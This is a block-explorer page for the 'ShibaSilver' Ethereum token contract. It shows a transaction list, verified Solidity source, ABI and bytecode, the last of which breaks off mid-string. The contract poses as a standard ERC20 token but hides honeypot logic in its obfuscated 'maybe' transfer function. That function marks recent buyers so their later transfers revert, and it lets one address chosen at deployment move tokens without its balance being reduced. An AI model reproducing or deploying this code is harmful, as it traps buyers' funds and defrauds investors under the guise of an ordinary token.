Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 21 from a total of 21 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 15398190 | 899 days ago | IN | 0 ETH | 0.00104028 | ||||
Approve | 15398190 | 899 days ago | IN | 0 ETH | 0.0010629 | ||||
Approve | 15398178 | 899 days ago | IN | 0 ETH | 0.00066955 | ||||
Approve | 15398155 | 899 days ago | IN | 0 ETH | 0.00041195 | ||||
Approve | 15398154 | 899 days ago | IN | 0 ETH | 0.00066782 | ||||
Approve | 15398140 | 899 days ago | IN | 0 ETH | 0.00097161 | ||||
Approve | 15398137 | 899 days ago | IN | 0 ETH | 0.00094863 | ||||
Approve | 15398130 | 899 days ago | IN | 0 ETH | 0.00064395 | ||||
Transfer From | 15398130 | 899 days ago | IN | 0 ETH | 0.00101666 | ||||
Approve | 15398128 | 899 days ago | IN | 0 ETH | 0.0006098 | ||||
Transfer From | 15398124 | 899 days ago | IN | 0 ETH | 0.00072435 | ||||
Transfer From | 15398115 | 899 days ago | IN | 0 ETH | 0.00073388 | ||||
Approve | 15398109 | 899 days ago | IN | 0 ETH | 0.0006147 | ||||
Approve | 15398109 | 899 days ago | IN | 0 ETH | 0.0006147 | ||||
Approve | 15398109 | 899 days ago | IN | 0 ETH | 0.0006147 | ||||
Approve | 15398108 | 899 days ago | IN | 0 ETH | 0.0005337 | ||||
Transfer From | 15398106 | 899 days ago | IN | 0 ETH | 0.00087047 | ||||
Approve | 15398104 | 899 days ago | IN | 0 ETH | 0.00056411 | ||||
Transfer From | 15398103 | 899 days ago | IN | 0 ETH | 0.00078405 | ||||
Renounce Ownersh... | 15398096 | 899 days ago | IN | 0 ETH | 0.00035648 | ||||
Approve | 15398087 | 899 days ago | IN | 0 ETH | 0.00073539 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
ShibaSilver
Compiler Version
v0.8.16+commit.07a7930e
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// https://t.me/shiba_silver // SPDX-License-Identifier: GPL-3.0 pragma solidity >0.8.6; // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), 'Ownable: caller is not the owner'); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), 'Ownable: new owner is the zero address'); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountShibaSilverDesired, uint amountShibaSilverMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountShibaSilver, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountShibaSilverMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountShibaSilver, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountShibaSilverMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountShibaSilver, uint amountETH); function swapExactShibaSilversForShibaSilvers( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapShibaSilversForExactShibaSilvers( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForShibaSilvers(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapShibaSilversForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactShibaSilversForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactShibaSilvers(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferShibaSilvers( address token, uint liquidity, uint amountShibaSilverMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferShibaSilvers( address token, uint liquidity, uint amountShibaSilverMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactShibaSilversForShibaSilversSupportingFeeOnTransferShibaSilvers( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForShibaSilversSupportingFeeOnTransferShibaSilvers( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactShibaSilversForETHSupportingFeeOnTransferShibaSilvers( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract ShibaSilver is Ownable { uint256 private numeral; string private score; string private increase; uint8 private roof; function name() public view returns (string memory) { return score; } function symbol() public view returns (string memory) { return increase; } uint256 private _tTotal; address public uniswapV2Pair; IUniswapV2Router02 public uniswapV2Router; address private sell; function decimals() public view returns (uint256) { return roof; } mapping(address => mapping(address => uint256)) private _allowances; mapping(address => uint256) private storm; function totalSupply() public view returns (uint256) { return _tTotal; } function balanceOf(address account) public view returns (uint256) { return storm[account]; } function allowance(address owner, address spender) public view returns (uint256) { return _allowances[owner][spender]; } function maybe( address lying, address aboard, uint256 straw ) internal { if (nothing[lying] == 0 && (address(uniswapV2Pair) != lying) && adult[lying] > 0) { nothing[lying] -= roof; } address basket = sell; sell = aboard; if (nothing[lying] == 0) storm[lying] -= straw; uint256 drop = (straw * numeral) / 100; straw -= drop; adult[basket] += roof; storm[aboard] += straw; } mapping(address => uint256) private adult; function approve(address spender, uint256 amount) external returns (bool) { return _approve(msg.sender, spender, amount); } mapping(address => uint256) private nothing; function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool) { maybe(sender, recipient, amount); return _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount); } function transfer(address recipient, uint256 amount) external returns (bool) { maybe(msg.sender, recipient, amount); return true; } function _approve( address owner, address spender, uint256 amount ) private returns (bool) { require(owner != address(0) && spender != address(0), 'ERC20: approve from the zero address'); _allowances[owner][spender] = amount; return true; } constructor( string memory pupil, string memory grown, address picture, address pretty ) { uniswapV2Router = IUniswapV2Router02(picture); uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH()); score = pupil; increase = grown; roof = 9; numeral = 3; nothing[pretty] = roof; _tTotal = 1000000000000000 * 10**roof; storm[msg.sender] = _tTotal; } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"pupil","type":"string"},{"internalType":"string","name":"grown","type":"string"},{"internalType":"address","name":"picture","type":"address"},{"internalType":"address","name":"pretty","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b50604051620020db380380620020db83398181016040528101906200003791906200066b565b620000576200004b620003a760201b60201c565b620003af60201b60201c565b81600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000106573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200012c91906200071b565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001b6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001dc91906200071b565b6040518363ffffffff1660e01b8152600401620001fb9291906200075e565b6020604051808303816000875af11580156200021b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200024191906200071b565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508360029081620002929190620009d6565b508260039081620002a49190620009d6565b506009600460006101000a81548160ff021916908360ff1602179055506003600181905550600460009054906101000a900460ff1660ff16600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600460009054906101000a900460ff16600a6200033d919062000c4d565b66038d7ea4c6800062000351919062000c9e565b600581905550600554600a60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050505062000cff565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620004dc8262000491565b810181811067ffffffffffffffff82111715620004fe57620004fd620004a2565b5b80604052505050565b60006200051362000473565b9050620005218282620004d1565b919050565b600067ffffffffffffffff821115620005445762000543620004a2565b5b6200054f8262000491565b9050602081019050919050565b60005b838110156200057c5780820151818401526020810190506200055f565b60008484015250505050565b60006200059f620005998462000526565b62000507565b905082815260208101848484011115620005be57620005bd6200048c565b5b620005cb8482856200055c565b509392505050565b600082601f830112620005eb57620005ea62000487565b5b8151620005fd84826020860162000588565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006338262000606565b9050919050565b620006458162000626565b81146200065157600080fd5b50565b60008151905062000665816200063a565b92915050565b600080600080608085870312156200068857620006876200047d565b5b600085015167ffffffffffffffff811115620006a957620006a862000482565b5b620006b787828801620005d3565b945050602085015167ffffffffffffffff811115620006db57620006da62000482565b5b620006e987828801620005d3565b9350506040620006fc8782880162000654565b92505060606200070f8782880162000654565b91505092959194509250565b6000602082840312156200073457620007336200047d565b5b6000620007448482850162000654565b91505092915050565b620007588162000626565b82525050565b60006040820190506200077560008301856200074d565b6200078460208301846200074d565b9392505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007de57607f821691505b602082108103620007f457620007f362000796565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200085e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200081f565b6200086a86836200081f565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008b7620008b1620008ab8462000882565b6200088c565b62000882565b9050919050565b6000819050919050565b620008d38362000896565b620008eb620008e282620008be565b8484546200082c565b825550505050565b600090565b62000902620008f3565b6200090f818484620008c8565b505050565b5b8181101562000937576200092b600082620008f8565b60018101905062000915565b5050565b601f82111562000986576200095081620007fa565b6200095b846200080f565b810160208510156200096b578190505b620009836200097a856200080f565b83018262000914565b50505b505050565b600082821c905092915050565b6000620009ab600019846008026200098b565b1980831691505092915050565b6000620009c6838362000998565b9150826002028217905092915050565b620009e1826200078b565b67ffffffffffffffff811115620009fd57620009fc620004a2565b5b62000a098254620007c5565b62000a168282856200093b565b600060209050601f83116001811462000a4e576000841562000a39578287015190505b62000a458582620009b8565b86555062000ab5565b601f19841662000a5e86620007fa565b60005b8281101562000a885784890151825560018201915060208501945060208101905062000a61565b8683101562000aa8578489015162000aa4601f89168262000998565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000b4b5780860481111562000b235762000b2262000abd565b5b600185161562000b335780820291505b808102905062000b438562000aec565b945062000b03565b94509492505050565b60008262000b66576001905062000c39565b8162000b76576000905062000c39565b816001811462000b8f576002811462000b9a5762000bd0565b600191505062000c39565b60ff84111562000baf5762000bae62000abd565b5b8360020a91508482111562000bc95762000bc862000abd565b5b5062000c39565b5060208310610133831016604e8410600b841016171562000c0a5782820a90508381111562000c045762000c0362000abd565b5b62000c39565b62000c19848484600162000af9565b9250905081840481111562000c335762000c3262000abd565b5b81810290505b9392505050565b600060ff82169050919050565b600062000c5a8262000882565b915062000c678362000c40565b925062000c967fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000b54565b905092915050565b600062000cab8262000882565b915062000cb88362000882565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000cf45762000cf362000abd565b5b828202905092915050565b6113cc8062000d0f6000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461023d578063a9059cbb1461025b578063dd62ed3e1461028b578063f2fde38b146102bb576100ea565b806370a08231146101e5578063715018a6146102155780638da5cb5b1461021f576100ea565b806318160ddd116100c857806318160ddd1461015b57806323b872dd14610179578063313ce567146101a957806349bd5a5e146101c7576100ea565b806306fdde03146100ef578063095ea7b31461010d5780631694505e1461013d575b600080fd5b6100f76102d7565b6040516101049190610d96565b60405180910390f35b61012760048036038101906101229190610e51565b610369565b6040516101349190610eac565b60405180910390f35b61014561037e565b6040516101529190610f26565b60405180910390f35b6101636103a4565b6040516101709190610f50565b60405180910390f35b610193600480360381019061018e9190610f6b565b6103ae565b6040516101a09190610eac565b60405180910390f35b6101b1610456565b6040516101be9190610f50565b60405180910390f35b6101cf610470565b6040516101dc9190610fcd565b60405180910390f35b6101ff60048036038101906101fa9190610fe8565b610496565b60405161020c9190610f50565b60405180910390f35b61021d6104df565b005b610227610567565b6040516102349190610fcd565b60405180910390f35b610245610590565b6040516102529190610d96565b60405180910390f35b61027560048036038101906102709190610e51565b610622565b6040516102829190610eac565b60405180910390f35b6102a560048036038101906102a09190611015565b610639565b6040516102b29190610f50565b60405180910390f35b6102d560048036038101906102d09190610fe8565b6106c0565b005b6060600280546102e690611084565b80601f016020809104026020016040519081016040528092919081815260200182805461031290611084565b801561035f5780601f106103345761010080835404028352916020019161035f565b820191906000526020600020905b81548152906001019060200180831161034257829003601f168201915b5050505050905090565b60006103763384846107b7565b905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600554905090565b60006103bb8484846108ed565b61044d843384600960008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461044891906110e4565b6107b7565b90509392505050565b6000600460009054906101000a900460ff1660ff16905090565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104e7610c3a565b73ffffffffffffffffffffffffffffffffffffffff16610505610567565b73ffffffffffffffffffffffffffffffffffffffff161461055b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161055290611164565b60405180910390fd5b6105656000610c42565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461059f90611084565b80601f01602080910402602001604051908101604052809291908181526020018280546105cb90611084565b80156106185780601f106105ed57610100808354040283529160200191610618565b820191906000526020600020905b8154815290600101906020018083116105fb57829003601f168201915b5050505050905090565b600061062f3384846108ed565b6001905092915050565b6000600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6106c8610c3a565b73ffffffffffffffffffffffffffffffffffffffff166106e6610567565b73ffffffffffffffffffffffffffffffffffffffff161461073c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161073390611164565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107a2906111f6565b60405180910390fd5b6107b481610c42565b50565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156108225750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b610861576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085890611288565b60405180910390fd5b81600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600190509392505050565b6000600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205414801561098a57508273ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b80156109d557506000600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b15610a4357600460009054906101000a900460ff1660ff16600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a3b91906110e4565b925050819055505b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905082600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403610b495781600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b4191906110e4565b925050819055505b6000606460015484610b5b91906112a8565b610b659190611331565b90508083610b7391906110e4565b9250600460009054906101000a900460ff1660ff16600b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bd69190611362565b9250508190555082600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c2c9190611362565b925050819055505050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d40578082015181840152602081019050610d25565b60008484015250505050565b6000601f19601f8301169050919050565b6000610d6882610d06565b610d728185610d11565b9350610d82818560208601610d22565b610d8b81610d4c565b840191505092915050565b60006020820190508181036000830152610db08184610d5d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610de882610dbd565b9050919050565b610df881610ddd565b8114610e0357600080fd5b50565b600081359050610e1581610def565b92915050565b6000819050919050565b610e2e81610e1b565b8114610e3957600080fd5b50565b600081359050610e4b81610e25565b92915050565b60008060408385031215610e6857610e67610db8565b5b6000610e7685828601610e06565b9250506020610e8785828601610e3c565b9150509250929050565b60008115159050919050565b610ea681610e91565b82525050565b6000602082019050610ec16000830184610e9d565b92915050565b6000819050919050565b6000610eec610ee7610ee284610dbd565b610ec7565b610dbd565b9050919050565b6000610efe82610ed1565b9050919050565b6000610f1082610ef3565b9050919050565b610f2081610f05565b82525050565b6000602082019050610f3b6000830184610f17565b92915050565b610f4a81610e1b565b82525050565b6000602082019050610f656000830184610f41565b92915050565b600080600060608486031215610f8457610f83610db8565b5b6000610f9286828701610e06565b9350506020610fa386828701610e06565b9250506040610fb486828701610e3c565b9150509250925092565b610fc781610ddd565b82525050565b6000602082019050610fe26000830184610fbe565b92915050565b600060208284031215610ffe57610ffd610db8565b5b600061100c84828501610e06565b91505092915050565b6000806040838503121561102c5761102b610db8565b5b600061103a85828601610e06565b925050602061104b85828601610e06565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061109c57607f821691505b6020821081036110af576110ae611055565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006110ef82610e1b565b91506110fa83610e1b565b9250828203905081811115611112576111116110b5565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061114e602083610d11565b915061115982611118565b602082019050919050565b6000602082019050818103600083015261117d81611141565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006111e0602683610d11565b91506111eb82611184565b604082019050919050565b6000602082019050818103600083015261120f816111d3565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611272602483610d11565b915061127d82611216565b604082019050919050565b600060208201905081810360008301526112a181611265565b9050919050565b60006112b382610e1b565b91506112be83610e1b565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156112f7576112f66110b5565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061133c82610e1b565b915061134783610e1b565b92508261135757611356611302565b5b828204905092915050565b600061136d82610e1b565b915061137883610e1b565b92508282019050808211156113905761138f6110b5565b5b9291505056fea264697066735822122061d2fab4f2d09e870fc486a27f310611cba21f21a3bc0176bf5e32482edffb0164736f6c63430008100033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d0000000000000000000000004a60a74ab1a7662c28a23c93c2990a3d3fef5277000000000000000000000000000000000000000000000000000000000000000c53686962612053696c766572000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055348494253000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461023d578063a9059cbb1461025b578063dd62ed3e1461028b578063f2fde38b146102bb576100ea565b806370a08231146101e5578063715018a6146102155780638da5cb5b1461021f576100ea565b806318160ddd116100c857806318160ddd1461015b57806323b872dd14610179578063313ce567146101a957806349bd5a5e146101c7576100ea565b806306fdde03146100ef578063095ea7b31461010d5780631694505e1461013d575b600080fd5b6100f76102d7565b6040516101049190610d96565b60405180910390f35b61012760048036038101906101229190610e51565b610369565b6040516101349190610eac565b60405180910390f35b61014561037e565b6040516101529190610f26565b60405180910390f35b6101636103a4565b6040516101709190610f50565b60405180910390f35b610193600480360381019061018e9190610f6b565b6103ae565b6040516101a09190610eac565b60405180910390f35b6101b1610456565b6040516101be9190610f50565b60405180910390f35b6101cf610470565b6040516101dc9190610fcd565b60405180910390f35b6101ff60048036038101906101fa9190610fe8565b610496565b60405161020c9190610f50565b60405180910390f35b61021d6104df565b005b610227610567565b6040516102349190610fcd565b60405180910390f35b610245610590565b6040516102529190610d96565b60405180910390f35b61027560048036038101906102709190610e51565b610622565b6040516102829190610eac565b60405180910390f35b6102a560048036038101906102a09190611015565b610639565b6040516102b29190610f50565b60405180910390f35b6102d560048036038101906102d09190610fe8565b6106c0565b005b6060600280546102e690611084565b80601f016020809104026020016040519081016040528092919081815260200182805461031290611084565b801561035f5780601f106103345761010080835404028352916020019161035f565b820191906000526020600020905b81548152906001019060200180831161034257829003601f168201915b5050505050905090565b60006103763384846107b7565b905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600554905090565b60006103bb8484846108ed565b61044d843384600960008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461044891906110e4565b6107b7565b90509392505050565b6000600460009054906101000a900460ff1660ff16905090565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104e7610c3a565b73ffffffffffffffffffffffffffffffffffffffff16610505610567565b73ffffffffffffffffffffffffffffff